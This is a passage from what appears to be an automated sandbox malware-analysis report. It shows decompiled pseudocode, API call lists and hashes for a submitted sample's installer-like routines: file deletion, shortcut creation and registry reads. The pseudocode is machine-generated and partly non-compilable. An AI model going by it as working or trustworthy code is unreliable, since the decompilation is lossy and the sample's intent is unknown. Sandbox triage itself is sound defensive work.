					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00bba255
0x00bba25c
0x00bba264
0x00bba267
0x00bba274
0x00bba27b
0x00bba283
0x00bba289
0x00bba289
0x00bba28b
0x00bba28e
0x00bba293
0x00000000
0x00bba293
0x00bba29d

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00BBA25C
SHAutoComplete.SHLWAPI(?,00000010), ref: 00BBA293

Part of subcall function 00BB1708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,00BABA45,00000000,.exe,?,?,00000800,?,?,00BB854F,?), ref: 00BB171E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BBA283

Strings

EDIT, xrefs: 00BBA267, 00BBA272, 00BBA27F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 37b812eded3b4e9d437bf74e37ddfe8d58e12e4607c2efa670d2b72affceb127
Instruction ID: a6aa6870677c5889b323ee8f18fbf4462d5fff4639039a7f217e10b0f186cd3a
Opcode Fuzzy Hash: 37b812eded3b4e9d437bf74e37ddfe8d58e12e4607c2efa670d2b72affceb127
Instruction Fuzzy Hash: 14F0E232A012287BE72056659C09FEFB7ECDF46B11F4801A6FD44A3280D7A1DD41C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA2B3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00BBA2B3(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00BAFFE3(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xc0117c(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xc01034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00BBE094(); // executed
				 *0xc01088(0xbe7430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00bba2c2
0x00bba2c9
0x00bba2cc
0x00bba2d5
0x00bba2dd
0x00bba2e4
0x00bba2ee
0x00bba2f9
0x00bba2fd
0x00bba300
0x00bba303
0x00bba30d
0x00bba31a

APIs

Part of subcall function 00BAFFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BAFFFE
Part of subcall function 00BAFFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAEAC6,Crypt32.dll,00000000,00BAEB4A,?,?,00BAEB2C,?,?,?), ref: 00BB0020

OleInitialize.OLE32(00000000), ref: 00BBA2CC
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBA303
SHGetMalloc.SHELL32(00BE7430), ref: 00BBA30D

Strings

riched20.dll, xrefs: 00BBA2BB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: e96206322c69c97065c3da8b48a64921f9f2958aacb3a7f019484135d59bf468
Instruction ID: 26c8eff62c2f16a52d31b3764c2bf083d3ee47f921d54547919b07e063e1e667
Opcode Fuzzy Hash: e96206322c69c97065c3da8b48a64921f9f2958aacb3a7f019484135d59bf468
Instruction Fuzzy Hash: 63F049B1C04209ABCB10AFA9D849AEFFFFCEF85705F00419AE854E2210DBB44645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA97EE Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00BA97EE(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00BA9929(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00BA97EE(_t25);
						}
					}
				}
				return _t15;
			}

0x00ba97f1
0x00ba97f3
0x00ba97fa
0x00ba9804
0x00ba9804
0x00ba9816
0x00ba981e
0x00ba987a
0x00ba9820
0x00ba9822
0x00ba9829
0x00ba9842
0x00ba9846
0x00ba9857
0x00ba985b
0x00ba9875
0x00ba9875
0x00ba9867
0x00ba9867
0x00ba9870
0x00000000
0x00ba9872
0x00ba9872
0x00000000
0x00ba9872
0x00ba9870
0x00ba9848
0x00ba9848
0x00ba9851
0x00000000
0x00ba9853
0x00ba9853
0x00ba9853
0x00ba9851
0x00ba982b
0x00ba982b
0x00ba9833
0x00000000
0x00ba9835
0x00ba9835
0x00ba9836
0x00ba9836
0x00ba983b
0x00ba983b
0x00ba9833
0x00ba9829
0x00ba9882

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BA97FE
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00BA9816
GetLastError.KERNEL32 ref: 00BA9848
GetLastError.KERNEL32 ref: 00BA9867

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: b4126e6f84b54ec95b35bd461d5d568b41d9ca8fdf90d6daafe9d9c17d9c1c7a
Instruction ID: 18c989482be381d78d5cc7fba2d3fe941346c28d6f1923f176cfe6d31cdebe41
Opcode Fuzzy Hash: b4126e6f84b54ec95b35bd461d5d568b41d9ca8fdf90d6daafe9d9c17d9c1c7a
Instruction Fuzzy Hash: 98117C34908204EBDF205B50C904A6A77E9EF173E1F10C5AAF86AC61A0EB39DD40FF51

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA374 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00BCA374(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xc005d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xbd5e70 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xb57946a1
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00bca379
0x00bca37d
0x00bca384
0x00bca388
0x00bca396
0x00bca3a6
0x00bca3ac
0x00bca3b0
0x00bca3d9
0x00bca3db
0x00bca3df
0x00bca3e2
0x00bca3e2
0x00bca3e8
0x00bca3ea
0x00000000
0x00bca3eb
0x00bca3b2
0x00bca3bb
0x00bca3ca
0x00bca3bd
0x00bca3c0
0x00bca3c6
0x00bca3c6
0x00bca3ce
0x00000000
0x00bca3d0
0x00bca3d3
0x00bca3d5
0x00000000
0x00bca3d5
0x00bca3ce
0x00bca38a
0x00bca38f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BC36CF,00000000,00000000,?,00BCA31B,00BC36CF,00000000,00000000,00000000,?,00BCA518,00000006,FlsSetValue), ref: 00BCA3A6
GetLastError.KERNEL32(?,00BCA31B,00BC36CF,00000000,00000000,00000000,?,00BCA518,00000006,FlsSetValue,00BD6328,00BD6330,00000000,00000364,?,00BC8EF7), ref: 00BCA3B2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BCA31B,00BC36CF,00000000,00000000,00000000,?,00BCA518,00000006,FlsSetValue,00BD6328,00BD6330,00000000), ref: 00BCA3C0

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1b41c82f03d192f21217c057a3fc1576530caf4c1cc26c0aa5ba7376dcfb610b
Instruction ID: 4d7e1258a3b24628a1b65d9ce7c78f7434200e7e25b40daae8c479be8a24c62c
Opcode Fuzzy Hash: 1b41c82f03d192f21217c057a3fc1576530caf4c1cc26c0aa5ba7376dcfb610b
Instruction Fuzzy Hash: D7017B3260226E9BC7314B78DCA4F57BBDCEF917A6720026AF906E3140EB20C800C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC5A1 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 269
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00BBC5A1(intOrPtr __ebx, void* __edx) {
				void* __edi;
				intOrPtr _t207;
				void* _t208;
				void* _t271;
				signed int _t272;
				void* _t275;
				signed int _t276;
				void* _t280;

				L0:
				while(1) {
					L0:
					_t271 = __edx;
					if(__ebx != 6) {
						goto L162;
					}
					L122:
					__eax = 0;
					 *(__ebp - 0x2c3c) = __ax;
					__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
					__eax = E00BC6280( *(__ebp - 0x1bc8c) & 0x0000ffff);
					_push(0x800);
					__eflags = __eax - 0x50;
					if(__eax == 0x50) {
						_push(0xbfab7a);
						__eax = __ebp - 0x2c3c;
						_push(__ebp - 0x2c3c);
						__eax = E00BAFD96();
						 *(__ebp - 0x14) = 2;
					} else {
						__eflags = __eax - 0x54;
						__eax = __ebp - 0x2c3c;
						if(__eflags == 0) {
							_push(0xbf9b7a);
							_push(__eax);
							__eax = E00BAFD96();
							 *(__ebp - 0x14) = 7;
						} else {
							_push(0xbfbb7a);
							_push(__eax);
							__eax = E00BAFD96();
							 *(__ebp - 0x14) = 0x10;
						}
					}
					__eax = 0;
					 *(__ebp - 0x9c8c) = __ax;
					 *(__ebp - 0x1c3c) = __ax;
					__ebp - 0x19c8c = __ebp - 0x6c84;
					__eax = E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8c);
					_pop(__ecx);
					_pop(__ecx);
					__ebx = 0x22;
					__eflags =  *(__ebp - 0x6c84) - __bx;
					if( *(__ebp - 0x6c84) != __bx) {
						L130:
						__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
						__eflags = __al;
						if(__al != 0) {
							goto L147;
						}
						L131:
						__ebx = __edi;
						__esi = __ebp - 0x6c84;
						__eflags =  *(__ebp - 0x6c84) - __bx;
						if( *(__ebp - 0x6c84) == __bx) {
							goto L147;
						}
						L132:
						__ecx = 0x20;
						do {
							L133:
							__eax = __esi->i & 0x0000ffff;
							__eflags = __ax - __cx;
							if(__ax == __cx) {
								L135:
								__edi = __eax;
								__eax = 0;
								__esi->i = __ax;
								__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
								__eflags = __al;
								if(__al == 0) {
									L142:
									__esi->i = __di;
									L143:
									__ecx = 0x20;
									__edi = 0;
									__eflags = 0;
									goto L144;
								}
								L136:
								__eax = 0x2f;
								__ebx = __esi;
								__eflags = __di - __ax;
								if(__di != __ax) {
									L138:
									__eax = 0x20;
									do {
										L139:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __ax;
									} while (__esi->i == __ax);
									_push(__esi);
									__eax = __ebp - 0x1c3c;
									L141:
									__eax = E00BC5646();
									__ecx = __eax;
									_pop(__ecx);
									 *__ebx = __di;
									goto L143;
								}
								L137:
								 *(__ebp - 0x1c3c) = __ax;
								__eax =  &(__esi->i);
								_push( &(__esi->i));
								__eax = __ebp - 0x1c3a;
								goto L141;
							}
							L134:
							__edx = 0x2f;
							__eflags = __ax - __dx;
							if(__ax != __dx) {
								goto L144;
							}
							goto L135;
							L144:
							__esi =  &(__esi->i);
							__eflags = __esi->i - __di;
						} while (__esi->i != __di);
						__eflags = __ebx;
						if(__ebx != 0) {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __ax;
						}
						goto L147;
					} else {
						L128:
						__ebp - 0x19c8a = __ebp - 0x6c84;
						E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
						_push(__ebx);
						_push(__ebp - 0x6c82);
						__eax = E00BC1438(__ecx);
						__esp = __esp + 0x10;
						__eflags = __eax;
						if(__eax != 0) {
							__ecx = 0;
							 *__eax = __cx;
							__ebp - 0x1c3c = E00BC5646(__ebp - 0x1c3c, __ebp - 0x1c3c);
							_pop(__ecx);
							_pop(__ecx);
						}
						L147:
						__eflags =  *((short*)(__ebp - 0x11c8c));
						__ebx = 0x800;
						if( *((short*)(__ebp - 0x11c8c)) != 0) {
							__ebp - 0x9c8c = __ebp - 0x11c8c;
							__eax = E00BAB179(__ebp - 0x11c8c, __ebp - 0x9c8c, 0x800);
						}
						__ebp - 0xbc8c = __ebp - 0x6c84;
						__eax = E00BAB179(__ebp - 0x6c84, __ebp - 0xbc8c, __ebx);
						__eflags =  *(__ebp - 0x2c3c);
						if(__eflags == 0) {
							__ebp - 0x2c3c = E00BBAA7E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14)); // executed
						}
						__ebp - 0x2c3c = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
						__eflags =  *((short*)(__ebp - 0x17c8c));
						if(__eflags != 0) {
							__ebp - 0x17c8c = __ebp - 0x2c3c;
							E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
							__eax = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
						}
						__ebp - 0x2c3c = __ebp - 0xcc8c;
						__eax = E00BC5646(__ebp - 0xcc8c, __ebp - 0x2c3c);
						__eflags =  *(__ebp - 0x13c8c);
						__eax = __ebp - 0x13c8c;
						_pop(__ecx);
						_pop(__ecx);
						if(__eflags == 0) {
							__eax = __ebp - 0x19c8c;
						}
						__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
						__eax = __ebp - 0x2c3c;
						__eflags = E00BAB3D3(__ebp - 0x2c3c);
						if(__eflags == 0) {
							L157:
							__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
							goto L158;
						} else {
							L156:
							__eflags = __eax;
							if(__eflags == 0) {
								L158:
								__eax = __ebp - 0x2c3c;
								_push(__ebp - 0x2c3c);
								E00BA9F8F(__ecx, __ebp) = __ebp - 0xbc8c;
								__ebp - 0xac8c = E00BC5646(__ebp - 0xac8c, __ebp - 0xbc8c);
								_pop(__ecx);
								__ecx = 1;
								__ebp - 0xac8c = E00BABC0F(__eflags, __ebp - 0xac8c);
								__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
								__eax = __ebp - 0x1c3c;
								__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
								__edx = __ebp - 0x9c8c;
								__esi = __ebp - 0xac8c;
								asm("sbb ecx, ecx");
								__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
								 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
								asm("sbb eax, eax");
								__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
								 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
								__eax = __ebp - 0x15c8c;
								asm("sbb edx, edx");
								__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
								E00BBA564(__ebp - 0x15c8c) = __ebp - 0x2c3c;
								__ebp - 0xbc8c = E00BB9B4C(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c); // executed
								__eflags =  *(__ebp - 0xcc8c);
								if( *(__ebp - 0xcc8c) != 0) {
									__eax = __ebp - 0xcc8c;
									SHChangeNotify(0x1000, 5, __ebp - 0xcc8c, __edi); // executed
								}
								while(1) {
									L162:
									_push(0x1000);
									_t195 = _t280 - 0xe; // 0xffffa36e
									_t196 = _t280 - 0xd; // 0xffffa36f
									_t197 = _t280 - 0x5c84; // 0xffff46f8
									_t198 = _t280 - 0xfc8c; // 0xfffea6f0
									_push( *((intOrPtr*)(_t280 + 0xc)));
									_t207 = E00BBA986();
									_t259 =  *((intOrPtr*)(_t280 + 0x10));
									 *((intOrPtr*)(_t280 + 0xc)) = _t207;
									if(_t207 != 0) {
										_t208 = _t280 - 0x5c84;
										_t275 = _t280 - 0x1bc8c;
										_t272 = 6;
										goto L2;
									} else {
										break;
									}
									L4:
									while(E00BB1708(_t280 - 0xfc8c,  *((intOrPtr*)(0xbdd618 + _t276 * 4))) != 0) {
										_t276 = _t276 + 1;
										if(_t276 < 0xe) {
											continue;
										} else {
											goto L162;
										}
									}
									__eflags = _t276 - 0xd;
									if(_t276 > 0xd) {
										continue;
									}
									L8:
									switch( *((intOrPtr*)(_t276 * 4 +  &M00BBC929))) {
										case 0:
											L9:
											__eflags = _t259 - 2;
											if(_t259 == 2) {
												E00BB9D58(_t280 - 0x7c84, 0x800);
												E00BAA3DD(E00BAB8A5(_t280 - 0x7c84, _t280 - 0x5c84, _t280 - 0xdc8c, 0x800), _t259, _t280 - 0x8c8c, _t276);
												 *(_t280 - 4) = 0;
												E00BAA517(_t280 - 0x8c8c, _t280 - 0xdc8c);
												E00BA7098(_t280 - 0x3c84);
												while(1) {
													L23:
													_push(0);
													_t266 = _t280 - 0x8c8c;
													_t222 = E00BAA46A(_t280 - 0x8c8c, _t271, _t280 - 0x3c84);
													__eflags = _t222;
													if(_t222 == 0) {
														break;
													}
													L11:
													SetFileAttributesW(_t280 - 0x3c84, 0);
													__eflags =  *(_t280 - 0x2c78);
													if(__eflags == 0) {
														L16:
														_t226 = GetFileAttributesW(_t280 - 0x3c84);
														__eflags = _t226 - 0xffffffff;
														if(_t226 == 0xffffffff) {
															continue;
														}
														L17:
														_t228 = DeleteFileW(_t280 - 0x3c84);
														__eflags = _t228;
														if(_t228 != 0) {
															continue;
														} else {
															_t278 = 0;
															_push(0);
															goto L20;
															L20:
															E00BA3FD6(_t280 - 0x103c, 0x800, L"%s.%d.tmp", _t280 - 0x3c84);
															_t282 = _t282 + 0x14;
															_t233 = GetFileAttributesW(_t280 - 0x103c);
															__eflags = _t233 - 0xffffffff;
															if(_t233 != 0xffffffff) {
																_t278 = _t278 + 1;
																__eflags = _t278;
																_push(_t278);
																goto L20;
															} else {
																_t236 = MoveFileW(_t280 - 0x3c84, _t280 - 0x103c);
																__eflags = _t236;
																if(_t236 != 0) {
																	MoveFileExW(_t280 - 0x103c, 0, 4);
																}
																continue;
															}
														}
													}
													L12:
													E00BAB437(_t266, __eflags, _t280 - 0x7c84, _t280 - 0x103c, 0x800);
													E00BAB147(__eflags, _t280 - 0x103c, 0x800);
													_t279 = E00BC33F3(_t280 - 0x7c84);
													__eflags = _t279 - 4;
													if(_t279 < 4) {
														L14:
														_t247 = E00BAB865(_t280 - 0x5c84);
														__eflags = _t247;
														if(_t247 != 0) {
															break;
														}
														L15:
														_t250 = E00BC33F3(_t280 - 0x3c84);
														__eflags = 0;
														 *((short*)(_t280 + _t250 * 2 - 0x3c82)) = 0;
														E00BBF1A0(0x800, _t280 - 0x3c, 0, 0x1e);
														_t282 = _t282 + 0x10;
														 *((intOrPtr*)(_t280 - 0x38)) = 3;
														_push(0x14);
														_pop(_t253);
														 *((short*)(_t280 - 0x2c)) = _t253;
														 *((intOrPtr*)(_t280 - 0x34)) = _t280 - 0x3c84;
														_push(_t280 - 0x3c);
														 *0xc01074();
														goto L16;
													}
													L13:
													_t258 = E00BC33F3(_t280 - 0x103c);
													__eflags = _t279 - _t258;
													if(_t279 > _t258) {
														goto L15;
													}
													goto L14;
												}
												L24:
												 *(_t280 - 4) =  *(_t280 - 4) | 0xffffffff;
												E00BAA3F3(_t280 - 0x8c8c);
											}
											goto L162;
										case 1:
											L25:
											__eflags = __ebx;
											if(__ebx == 0) {
												__eax = E00BC33F3(__esi);
												__eax = __edi + __eax;
												_push(__eax);
												_push( *0xbfcc7c);
												__eax = E00BC341E(__ecx, __edx);
												__esp = __esp + 0xc;
												__eflags = __eax;
												if(__eax != 0) {
													 *0xbfcc7c = __eax;
													__eflags = __bl;
													if(__bl != 0) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
													__eax = E00BC6FAD(__eax, __esi);
													_pop(__ecx);
													_pop(__ecx);
												}
												__eflags = __bh;
												if(__bh == 0) {
													__eax = L00BC340E(__esi);
												}
											}
											goto L162;
										case 2:
											L39:
											__eflags = __ebx;
											if(__ebx == 0) {
												__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
											}
											goto L162;
										case 3:
											L41:
											__eflags = __ebx;
											if(__ebx != 0) {
												goto L162;
											}
											L42:
											__eflags =  *0xbe9472 - __di;
											if( *0xbe9472 != __di) {
												goto L162;
											}
											L43:
											__eax = 0;
											__edi = __ebp - 0x5c84;
											_push(0x22);
											 *(__ebp - 0x103c) = __ax;
											_pop(__eax);
											__eflags =  *(__ebp - 0x5c84) - __ax;
											if( *(__ebp - 0x5c84) == __ax) {
												__edi = __ebp - 0x5c82;
											}
											__eax = E00BC33F3(__edi);
											__esi = 0x800;
											__eflags = __eax - 0x800;
											if(__eax >= 0x800) {
												goto L162;
											} else {
												L46:
												__eax =  *__edi & 0x0000ffff;
												_push(0x5c);
												_pop(__ecx);
												__eflags = ( *__edi & 0x0000ffff) - 0x2e;
												if(( *__edi & 0x0000ffff) != 0x2e) {
													L50:
													__eflags = __ax - __cx;
													if(__ax == __cx) {
														L62:
														__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, __esi);
														__ebx = 0;
														__eflags = 0;
														L63:
														_push(0x22);
														_pop(__eax);
														__eax = __ebp - 0x103c;
														__eax = E00BC161B(__ebp - 0x103c, __ebp - 0x103c);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
															if( *((intOrPtr*)(__eax + 2)) == __bx) {
																__ecx = 0;
																__eflags = 0;
																 *__eax = __cx;
															}
														}
														__eax = __ebp - 0x103c;
														__edi = 0xbe9472;
														E00BAFD96(0xbe9472, __ebp - 0x103c, __esi) = __ebp - 0x103c;
														__eax = E00BBA81F(__ebp - 0x103c, __esi);
														__esi = GetDlgItem( *(__ebp + 8), 0x66);
														__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
														__eax = SendMessageW(__esi, 0x143, __ebx, 0xbe9472); // executed
														__eax = __ebp - 0x103c;
														__eax = E00BC3429(__ebp - 0x103c, 0xbe9472, __eax);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
														}
														goto L162;
													}
													L51:
													__eflags = __ax;
													if(__ax == 0) {
														L53:
														__eax = __ebp - 0x18;
														__ebx = 0;
														_push(__ebp - 0x18);
														_push(1);
														_push(0);
														_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
														_push(0x80000002);
														__eax =  *0xc01028();
														__eflags = __eax;
														if(__eax == 0) {
															__eax = __ebp - 0x14;
															 *(__ebp - 0x14) = 0x1000;
															_push(__ebp - 0x14);
															__eax = __ebp - 0x103c;
															_push(__ebp - 0x103c);
															__eax = __ebp - 0x1c;
															_push(__ebp - 0x1c);
															_push(0);
															_push(L"ProgramFilesDir");
															_push( *(__ebp - 0x18));
															__eax =  *0xc01024();
															_push( *(__ebp - 0x18));
															 *0xc01004() =  *(__ebp - 0x14);
															__ecx = 0x7ff;
															__eax =  *(__ebp - 0x14) >> 1;
															__eflags = __eax - 0x7ff;
															if(__eax >= 0x7ff) {
																__eax = 0x7ff;
															}
															__ecx = 0;
															__eflags = 0;
															 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
														}
														__eflags =  *(__ebp - 0x103c) - __bx;
														if( *(__ebp - 0x103c) != __bx) {
															__eax = __ebp - 0x103c;
															__eax = E00BC33F3(__ebp - 0x103c);
															_push(0x5c);
															_pop(__ecx);
															__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
															if(__eflags != 0) {
																__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, "\\", __esi);
